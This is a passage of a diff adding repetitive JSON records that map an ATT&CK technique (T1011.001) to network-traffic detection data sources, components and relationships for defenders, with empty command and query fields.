level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1011.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized 